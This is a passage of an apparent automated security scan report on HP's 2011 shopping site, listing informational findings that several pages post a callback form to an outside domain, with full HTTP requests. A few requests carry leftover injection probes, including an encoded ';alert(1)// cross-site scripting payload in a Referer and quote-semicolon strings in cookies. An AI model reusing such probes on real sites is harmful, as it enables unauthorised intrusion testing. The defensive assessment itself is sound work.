Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Personal%20Shopper" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.2. http://www.shopping.hp.com/desktops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Computer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.3. http://www.shopping.hp.com/esp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Printer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.4. http://www.shopping.hp.com/printer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Printer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.5. http://www.shopping.hp.com/supplies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Accessories%20Store%20Printer%20Supplies" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.6. http://www.shopping.hp.com/webapp/shopping/home.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Personal%20Shopper" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.7. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Product%20Compare" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.8. http://www.shopping.hp.com/webapp/shopping/product_detail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:08:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 227618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Television%20PDP" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.9. http://www.shopping.hp.com/webapp/shopping/series_can.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
